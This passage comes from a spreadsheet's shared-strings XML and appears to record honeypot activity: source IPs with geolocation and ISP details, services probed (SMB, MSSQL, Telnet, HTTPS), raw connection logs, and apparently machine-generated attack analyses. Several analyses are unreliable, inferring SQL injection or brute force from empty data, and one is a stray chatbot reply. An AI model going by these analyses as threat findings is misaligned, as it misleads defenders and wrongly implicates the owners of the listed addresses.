    <t>853721829bd63ea24e482a4038fa438c</t>
  </si>
  <si>
    <t>202.166.209.229</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_MSSQL_H36&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MT-CPA_H35</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;445&amp;&amp;54999&amp;&amp;17819&amp;&amp;60177&amp;&amp;55810&amp;&amp;3306&amp;&amp;54297&amp;&amp;54256</t>
  </si>
  <si>
    <t>Patan (Jāwalākhel)</t>
  </si>
  <si>
    <t>27.6744</t>
  </si>
  <si>
    <t>85.3123</t>
  </si>
  <si>
    <t>17501</t>
  </si>
  <si>
    <t>WorldLink Communications</t>
  </si>
  <si>
    <t>WLIN</t>
  </si>
  <si>
    <t>2005-06-10</t>
  </si>
  <si>
    <t>WLINK_WIRELESS_STATIC_IP_SUBNET</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (202.166.209.229,55962)}&amp;&amp;{Data_SMB:Incoming connection (202.166.209.229,56602)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.166.209.229,61791)}&amp;&amp;{Data_SMB:Incoming connection (202.166.209.229,62249)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.166.209.229,56741)}&amp;&amp;{Data_SMB:Incoming connection (202.166.209.229,57351)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.166.209.229,62871)}&amp;&amp;{Data_SMB:Incoming connection (202.166.209.229,63347)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (202.166.209.229,49388)}&amp;&amp;{Data_SMB:Incoming connection (202.166.209.229,49951)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.166.209.229,49962)}&amp;&amp;{Data_SMB:Incoming connection (202.166.209.229,53080)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.166.209.229,56828)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.166.209.229,60101)}&amp;&amp;{Data_SMB:Incoming connection (202.166.209.229,60725)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.166.209.229,51341)}</t>
  </si>
  <si>
    <t>::ffff:caa6:d1e5</t>
  </si>
  <si>
    <t>de82928a3508129d739ddd1801efeb23</t>
  </si>
  <si>
    <t>80.191.106.77</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_SOCKS5_H24&amp;&amp;SMA-LAB_SMB_H38&amp;&amp;SMA-LAB_LDAP_H2&amp;&amp;SMA-LAB_SSH_H41&amp;&amp;SMA-LAB_HTTPS_H42&amp;&amp;SMA-LAB_HTTP_H41&amp;&amp;SMA-LAB_NTP_H40&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_SMB_H36&amp;&amp;SMA-LAB_MSSQL_H36&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_MYSQL_H18</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;1080&amp;&amp;445&amp;&amp;389&amp;&amp;22&amp;&amp;443&amp;&amp;80&amp;&amp;123&amp;&amp;29848&amp;&amp;3306</t>
  </si>
  <si>
    <t>Tehran (Behjatābād)</t>
  </si>
  <si>
    <t>35.7087</t>
  </si>
  <si>
    <t>51.4172</t>
  </si>
  <si>
    <t>Payam Nour University</t>
  </si>
  <si>
    <t>2002-07-23</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (80.191.106.77,60570)}&amp;&amp;{Data_SMB:Incoming connection (80.191.106.77,60843)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (80.191.106.77,63270)}&amp;&amp;{Data_SMB:Incoming connection (80.191.106.77,63903)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (80.191.106.77,65198)}&amp;&amp;{Data_SMB:Incoming connection (80.191.106.77,64583)}&amp;&amp;{Data_SMB:Incoming connection (80.191.106.77,64814)}&amp;&amp;{Data_SMB:Incoming connection (80.191.106.77,49803)}&amp;&amp;{Data_SMB:Incoming connection (80.191.106.77,54860)}</t>
  </si>
  <si>
    <t>::ffff:50bf:6a4d</t>
  </si>
  <si>
    <t>An incoming network connection from an unknown IP address is attempting to establish communication with the SMB service, which could indicate a brute-force attack or malicious scanning activity. The IP address 80.191.106.77 and port 54860 suggest a potential attempt to exploit vulnerabilities in the SMB service. This behavior may be indicative of reconnaissance or initial steps towards an intrusion. &amp;&amp; An incoming connection from an unknown IP address is attempting to access a service, which may be a sign of a malicious port scanning or reconnaissance activity. This could be an attempt to exploit a vulnerability in the system or to gain unauthorized access. The IP address 80.191.106.77 and port 54860 are involved in this suspicious activity.</t>
  </si>
  <si>
    <t>c2321e0d7a68b6dc349bc4411cd25115</t>
  </si>
  <si>
    <t>87.221.48.223</t>
  </si>
  <si>
    <t>223.48.221.87.dynamic.jazztel.es&amp;&amp;NA</t>
  </si>
  <si>
    <t>MD</t>
  </si>
  <si>
    <t>Madrid</t>
  </si>
  <si>
    <t>Pozuelo de Alarcón</t>
  </si>
  <si>
    <t>3112989</t>
  </si>
  <si>
    <t>28223</t>
  </si>
  <si>
    <t>40.4195</t>
  </si>
  <si>
    <t>-3.8014</t>
  </si>
  <si>
    <t>12479</t>
  </si>
  <si>
    <t>Orange Espagne SA</t>
  </si>
  <si>
    <t>Orange Spain</t>
  </si>
  <si>
    <t>Jazztel triple play services</t>
  </si>
  <si>
    <t>::ffff:57dd:30df</t>
  </si>
  <si>
    <t>5360f25c63f27d1e9e10f7d23765b825</t>
  </si>
  <si>
    <t>58.126.108.67</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H22</t>
  </si>
  <si>
    <t>Seoul (Toegye-ro)</t>
  </si>
  <si>
    <t>37.5614</t>
  </si>
  <si>
    <t>9318</t>
  </si>
  <si>
    <t>SK Broadband Co Ltd</t>
  </si>
  <si>
    <t>broadNnet</t>
  </si>
  <si>
    <t>::ffff:3a7e:6c43</t>
  </si>
  <si>
    <t>This log indicates that there is no available data to analyze at this time, so no malicious activity can be inferred from it. &amp;&amp; No telnet connection attempt detected, indicating possibly normal system operation or idle state with no malicious activity. &amp;&amp; No log data provided, unable to analyze.</t>
  </si>
  <si>
    <t>6d666d39d549c57caef346ad71bc399e</t>
  </si>
  <si>
    <t>184.168.123.171</t>
  </si>
  <si>
    <t>171.123.168.184.host.secureserver.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H4&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_MT-CPA_H42&amp;&amp;SMA-LAB_MSSQL_H25&amp;&amp;SMA-LAB_MSSQL_H7&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_MSSQL_H35</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;62786&amp;&amp;1433&amp;&amp;36440&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:b8a8:7bab</t>
  </si>
  <si>
    <t>ed59369162f96cb6f31422ebe752cbe8</t>
  </si>
  <si>
    <t>120.61.21.218</t>
  </si>
  <si>
    <t>::ffff:783d:15da</t>
  </si>
  <si>
    <t>No TELNET connection was made during this time period, but it's possible that an attacker attempted to connect or scan for a vulnerable service. The lack of activity might indicate the attackers were deterred by security measures. This could be indicative of reconnaissance activities from potential malicious actors. &amp;&amp; No activity detected for TELNET service, indicating no malicious connections attempted via this protocol. 
Normal behavior expected here as there is no incoming traffic recorded. 
 Service status appears to be idle.</t>
  </si>
  <si>
    <t>Telnet Attack</t>
  </si>
  <si>
    <t>f7121844fde1de345c844fda9991ddd9</t>
  </si>
  <si>
    <t>116.72.76.90</t>
  </si>
  <si>
    <t>::ffff:7448:4c5a</t>
  </si>
  <si>
    <t>f631536921bfed0b1a728413cc05052e</t>
  </si>
  <si>
    <t>121.173.30.38</t>
  </si>
  <si>
    <t>23&amp;&amp;NA&amp;&amp;9100</t>
  </si>
  <si>
    <t>Bucheon-si</t>
  </si>
  <si>
    <t>Bucheon-si (Wonmi-gu)</t>
  </si>
  <si>
    <t>1838716</t>
  </si>
  <si>
    <t>37.5064</t>
  </si>
  <si>
    <t>126.803</t>
  </si>
  <si>
    <t>{Data_TELNET:NA}&amp;&amp;NA&amp;&amp;{Data_PJL:NA}</t>
  </si>
  <si>
    <t>::ffff:79ad:1e26</t>
  </si>
  <si>
    <t>No available log data provided. &amp;&amp; This log indicates a failed attempt to use PJL (Print Job Language) for malicious purposes, potentially leading to unauthorized access or disruption of print services. The activity is likely a reconnaissance probe or an attack vector targeting printer systems. This behavior is indicative of a potential print-based malware delivery mechanism or lateral movement exploit.</t>
  </si>
  <si>
    <t>I need some log data to analyze! Please provide the log data from the honeypot. I'll then classify the attacks based on their names and format, and give you a list of attack types with a short phrase (max 2 words) for each one.
Once you provide the log data, I can proceed with the analysis.</t>
  </si>
  <si>
    <t>6fae9d9e32644a6eaba26f0dd9eb13cb</t>
  </si>
  <si>
    <t>119.196.10.141</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H11</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;58369&amp;&amp;23&amp;&amp;9100&amp;&amp;NA</t>
  </si>
  <si>
    <t>Dongjak-gu</t>
  </si>
  <si>
    <t>Noryangjin-dong</t>
  </si>
  <si>
    <t>6800117</t>
  </si>
  <si>
    <t>156050</t>
  </si>
  <si>
    <t>37.5116</t>
  </si>
  <si>
    <t>126.942</t>
  </si>
  <si>
    <t>query&amp;&amp;connection&amp;&amp;login&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_DHCP:{'53': 'x08', '55': 'x01x02x03x04x05x06x07x08	
x0bx0c_x000D_x0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1f !&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}</t>
  </si>
  <si>
    <t>::ffff:77c4:a8d</t>
  </si>
  <si>
    <t>There is insufficient information to analyze potential malicious activity.
(This is because the log data provided is "NA", which stands for "Not Available" or "No Data")</t>
  </si>
  <si>
    <t>ed26c71007c974af08ee7e557e28b093</t>
  </si>
  <si>
    <t>61.31.104.40</t>
  </si>
  <si>
    <t>61-31-104-40.static.tfn.net.tw&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_LDAP_H43&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H19</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;389&amp;&amp;80&amp;&amp;46710&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>25.0501</t>
  </si>
  <si>
    <t>121.565</t>
  </si>
  <si>
    <t>9924</t>
  </si>
  <si>
    <t>Taiwan Fixed Network, Telco and Network Service Provider.</t>
  </si>
  <si>
    <t>Taiwan Fixed Network</t>
  </si>
  <si>
    <t>Taiwan Fixed Network CO., LTD.</t>
  </si>
  <si>
    <t>2002-04-02</t>
  </si>
  <si>
    <t>TFN-NET</t>
  </si>
  <si>
    <t>1999-04-26 15:56:18</t>
  </si>
  <si>
    <t>2025-07-02 00:00:00</t>
  </si>
  <si>
    <t>dns2.tfn.net.tw     211.78.215.200 
      dns1.tfn.net.tw     211.78.215.137</t>
  </si>
  <si>
    <t>TWNIC</t>
  </si>
  <si>
    <t>::ffff:3d1f:6828</t>
  </si>
  <si>
    <t>No malicious activity detected, likely due to lack of interaction or failed connection attempt via TELNET service. The log indicates no traffic was received for the service, suggesting it remains idle. No security concern is raised by this entry.</t>
  </si>
  <si>
    <t>b1eade7a69e7e5eaeb8b6b447d0c860f</t>
  </si>
  <si>
    <t>14.253.124.140</t>
  </si>
  <si>
    <t>SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>::ffff:efd:7c8c</t>
  </si>
  <si>
    <t>No connection attempt detected from MySQL service. &amp;&amp; No malicious activity detected, as no connection was attempted to MSSQL service. Service is presumably inactive or not targeted. No attempt made to exploit the service.</t>
  </si>
  <si>
    <t>20d92e856d23aa018c8b75c3998704d6</t>
  </si>
  <si>
    <t>103.90.38.122</t>
  </si>
  <si>
    <t>Dharmapuri</t>
  </si>
  <si>
    <t>Dharmapuri (Lakkiampatty)</t>
  </si>
  <si>
    <t>1272847</t>
  </si>
  <si>
    <t>636701</t>
  </si>
  <si>
    <t>12.1152</t>
  </si>
  <si>
    <t>78.1528</t>
  </si>
  <si>
    <t>151686</t>
  </si>
  <si>
    <t>VEDINIRMALA-AS-IN</t>
  </si>
  <si>
    <t>Vedinirmala Broadband PVT LTD</t>
  </si>
  <si>
    <t>::ffff:675a:267a</t>
  </si>
  <si>
    <t>53c82a0aa36d6ef6825c6c9ecc01ade4</t>
  </si>
  <si>
    <t>47.236.181.250</t>
  </si>
  <si>
    <t>SMA-LAB_FTP_H11&amp;&amp;SMA-LAB_FTP_HC1</t>
  </si>
  <si>
    <t>21&amp;&amp;8443&amp;&amp;NA&amp;&amp;3306</t>
  </si>
  <si>
    <t>45102</t>
  </si>
  <si>
    <t>Alibaba (US) Technology Co., Ltd.</t>
  </si>
  <si>
    <t>Alibaba.com LLC</t>
  </si>
  <si>
    <t>{Data_FTP:NA}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/json,application/xhtml+xml, application/xml;q=0.9, */*;q=0.8', 'Accept-Encoding': 'deflate, gzip', 'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6', 'Host': '103.211.202.140:8443', 'User-Agent': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'deflate, gzip', 'Host': '103.211.202.140:8443', 'User-Agent': 'curl/7.75.0', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;NA&amp;&amp;{Data_MYSQL:NA}</t>
  </si>
  <si>
    <t>::ffff:2fec:b5fa</t>
  </si>
  <si>
    <t>fd2fb99438b4a4776ca7ca91117e4d47</t>
  </si>
  <si>
    <t>123.231.151.154</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_MSSQL_H13</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;60157&amp;&amp;1433&amp;&amp;445</t>
  </si>
  <si>
    <t>Jakarta Pusat</t>
  </si>
  <si>
    <t>6754874</t>
  </si>
  <si>
    <t>-6.18559</t>
  </si>
  <si>
    <t>106.823</t>
  </si>
  <si>
    <t>LINTASARTA</t>
  </si>
  <si>
    <t>LINTASARTA-NET</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,60077)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,61584)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,7908)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,9451)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,17867)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,5129)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,6645)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,26991)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,29338)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,55900)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,58029)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,64230)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,5654)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,43444)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,45799)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,39126)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,39721)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,41099)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,42739)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,6505)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,7807)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,39523)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,53475)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,54311)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,63247)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,64939)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,22621)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,24249)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,11346)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,12295)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,51628)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,52742)}</t>
  </si>
  <si>
    <t>::ffff:7be7:979a</t>
  </si>
  <si>
    <t>An incoming connection from an unknown IP address is attempting to access shared files. The IP 123.231.151.154 may be probing for vulnerabilities or trying to exploit SMB services. This could indicate a potential scanning activity. &amp;&amp; An incoming connection from an unknown IP address (123.231.151.154) is attempting to access the SMB service from a potentially vulnerable system. This could be an attempt to gain unauthorized access or spread malware through the network. The source port 52742 suggests a possible brute force attack or scanning activity.</t>
  </si>
  <si>
    <t>SMB Auth &amp;&amp; SMB Scanning &amp;&amp; Port Scan</t>
  </si>
  <si>
    <t>b19c0cf1338bce220ed09ab721cc61c7</t>
  </si>
  <si>
    <t>117.243.126.181</t>
  </si>
  <si>
    <t>::ffff:75f3:7eb5</t>
  </si>
  <si>
    <t>This suggests that there has been an attempted telnet connection, but it was refused or had no activity logged for this service. The lack of any reported data indicates either the attacker did not interact with the service or interactions were too minor to be noted. No further details are available about the potential malicious action. &amp;&amp; No malicious activity detected for Telnet service as log indicates unknown or unavailable data. 
Telnet service accessed but no known interactions were recorded possibly indicating a reconnaissance scan or probing attempt without actual interaction. 
Data is missing or not applicable which could indicate a failed connection or incomplete data transmission.</t>
  </si>
  <si>
    <t>9df0cbfa26b3738536a717f01e92ca8b</t>
  </si>
  <si>
    <t>164.100.130.1</t>
  </si>
  <si>
    <t>New Delhi (CGO Complex)</t>
  </si>
  <si>
    <t>28.5898</t>
  </si>
  <si>
    <t>77.2357</t>
  </si>
  <si>
    <t>National Informatics Centre</t>
  </si>
  <si>
    <t>1993-02-04</t>
  </si>
  <si>
    <t>NIC-SDC-PAT</t>
  </si>
  <si>
    <t>::ffff:a464:8201</t>
  </si>
  <si>
    <t>Potential SQL injection attempt detected, possibly targeting Microsoft SQL server database management system. Malicious actor may be attempting to exploit vulnerabilities in the database. This could result in unauthorized access or data manipulation. &amp;&amp; Possible login attempt to Microsoft SQL server as the user's credentials were not provided. This could be an attempt to gain unauthorized access or escalate privileges. The absence of username suggests it may be a brute-force attack.</t>
  </si>
  <si>
    <t>f7f5bcb2616c6cb2c162a3d238dcc911</t>
  </si>
  <si>
    <t>208.109.10.204</t>
  </si>
  <si>
    <t>NA&amp;&amp;204.10.109.208.host.secureserver.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MT-CPA_H6&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_MSSQL_H7&amp;&amp;SMA-LAB_MSSQL_H25&amp;&amp;SMA-LAB_MSSQL_H45</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;42172&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:d06d:acc</t>
  </si>
  <si>
    <t>44124ba0511477a63706045c81892a6f</t>
  </si>
  <si>
    <t>117.219.79.144</t>
  </si>
  <si>
    <t>Nuh</t>
  </si>
  <si>
    <t>Chandīgarh</t>
  </si>
  <si>
    <t>9915976</t>
  </si>
  <si>
    <t>160017</t>
  </si>
  <si>
    <t>30.7333</t>
  </si>
  <si>
    <t>76.7794</t>
  </si>
  <si>
    <t>::ffff:75db:4f90</t>
  </si>
  <si>
    <t>No TELNET activity detected. No malicious connections attempted over this service. The data indicates a lack of engagement with this particular interface.</t>
  </si>
  <si>
    <t>Brute Force</t>
  </si>
  <si>
    <t>4c0896079fd4c4f992be9c12064a2970</t>
  </si>
  <si>
    <t>115.96.120.4</t>
  </si>
  <si>
    <t>::ffff:7360:7804</t>
  </si>
  <si>
    <t>No TELNET connection was made. 
TELNET is commonly used for remote access, so this could indicate no suspicious activity detected via TELNET. 
However, lack of TELNET activity does not necessarily mean there's no malicious activity. &amp;&amp; No malicious activity detected for TELNET service. No connection or attempt made. Service is inactive or unavailable. &amp;&amp; No recent TELNET activity detected which could indicate a lack of attempts to breach via this service or an indication that an attack was attempted but failed or blocked. 
TELNET is a common protocol used for remote access, its absence in log data may suggest attackers are using more stealthy methods. 
This lack of activity might also indicate the service is not active or visible online.</t>
  </si>
  <si>
    <t>30641e2d853b7441a39de17f7283a34a</t>
  </si>
  <si>
    <t>120.56.95.220</t>
  </si>
  <si>
    <t>::ffff:7838:5fdc</t>
  </si>
  <si>
    <t>Possible attempts to connect to TELNET service without any successful activity or authentication. No login attempt detected within the available log data. The logs are incomplete for further analysis of malicious intent. &amp;&amp; There was no activity detected on this service since its last check, indicating it may be idle or disabled. The lack of data suggests that either the service is down or there has been no attempt to access it recently. It's possible that the service is not being utilized at all.</t>
  </si>
  <si>
    <t>bf146aab8d15eb466ed69d30444f245a</t>
  </si>
  <si>
    <t>117.209.82.174</t>
  </si>
  <si>
    <t>::ffff:75d1:52ae</t>
  </si>
  <si>
    <t>7a3f98e99b34f1ebe65dfcd0b70149e6</t>
  </si>
  <si>
    <t>35.150.228.5</t>
  </si>
  <si>
    <t>syn-035-150-228-005.res.spectrum.com</t>
  </si>
  <si>
    <t>GA</t>
  </si>
  <si>
    <t>Georgia</t>
  </si>
  <si>
    <t>Gwinnett</t>
  </si>
  <si>
    <t>Sugar Hill</t>
  </si>
  <si>
    <t>4225039</t>
  </si>
  <si>
    <t>34.1199</t>
  </si>
  <si>
    <t>-84.0379</t>
  </si>
  <si>
    <t>2017-06-30</t>
  </si>
  <si>
    <t>CC04</t>
  </si>
  <si>
    <t>::ffff:2396:e405</t>
  </si>
  <si>
    <t>Possible malicious activity is a fake login attempt from a browser with suspiciously high version numbers for Chrome and Safari. The IP address of the device making this request appears to be Windows 10 64-bit. This may be a phishing or brute-force attack. &amp;&amp; A user with a Google Chrome browser is attempting to access the login page for an HTTP service on a Windows 10 system. This could be a legitimate user trying to log in, but it may also indicate a malicious actor trying to brute-force or phish credentials. The version of Chrome (135.0.0.0) seems unusually high and may suggest spoofing or false information being provided.</t>
  </si>
  <si>
    <t>21f25bacb5ed628a271e8f1fa7f2acb2</t>
  </si>
  <si>
    <t>113.160.251.43</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_MSSQL_H35</t>
  </si>
  <si>
    <t>2008-11-04</t>
  </si>
  <si>
    <t>::ffff:71a0:fb2b</t>
  </si>
  <si>
    <t>The presence of this log entry indicates that an attacker is probing or attempting to exploit a vulnerability related to Microsoft SQL Server, as the data field for MSSQL is listed as 'Not Available' which suggests it has not been properly configured or exposed. This could be part of a larger reconnaissance effort by an attacker.</t>
  </si>
  <si>
    <t>1d4e1ad2796cb1b870dbf98e24305500</t>
  </si>
  <si>
    <t>117.208.223.83</t>
  </si>
  <si>
    <t>::ffff:75d0:df53</t>
  </si>
  <si>
    <t>c1cb77274a391a78b3c9251c3deb372c</t>
  </si>
  <si>
    <t>163.13.46.205</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>25.033</t>
  </si>
  <si>
    <t>1659</t>
  </si>
  <si>
    <t>Taiwan Academic Network (TANet) Information Center</t>
  </si>
  <si>
    <t>Tanet B</t>
  </si>
  <si>
    <t>1992-07-06</t>
  </si>
  <si>
    <t>TANET-B</t>
  </si>
  <si>
    <t>::ffff:a30d:2ecd</t>
  </si>
  <si>
    <t>6d163cc0fd298a0b0f792b728573387d</t>
  </si>
  <si>
    <t>180.250.196.141</t>
  </si>
  <si>
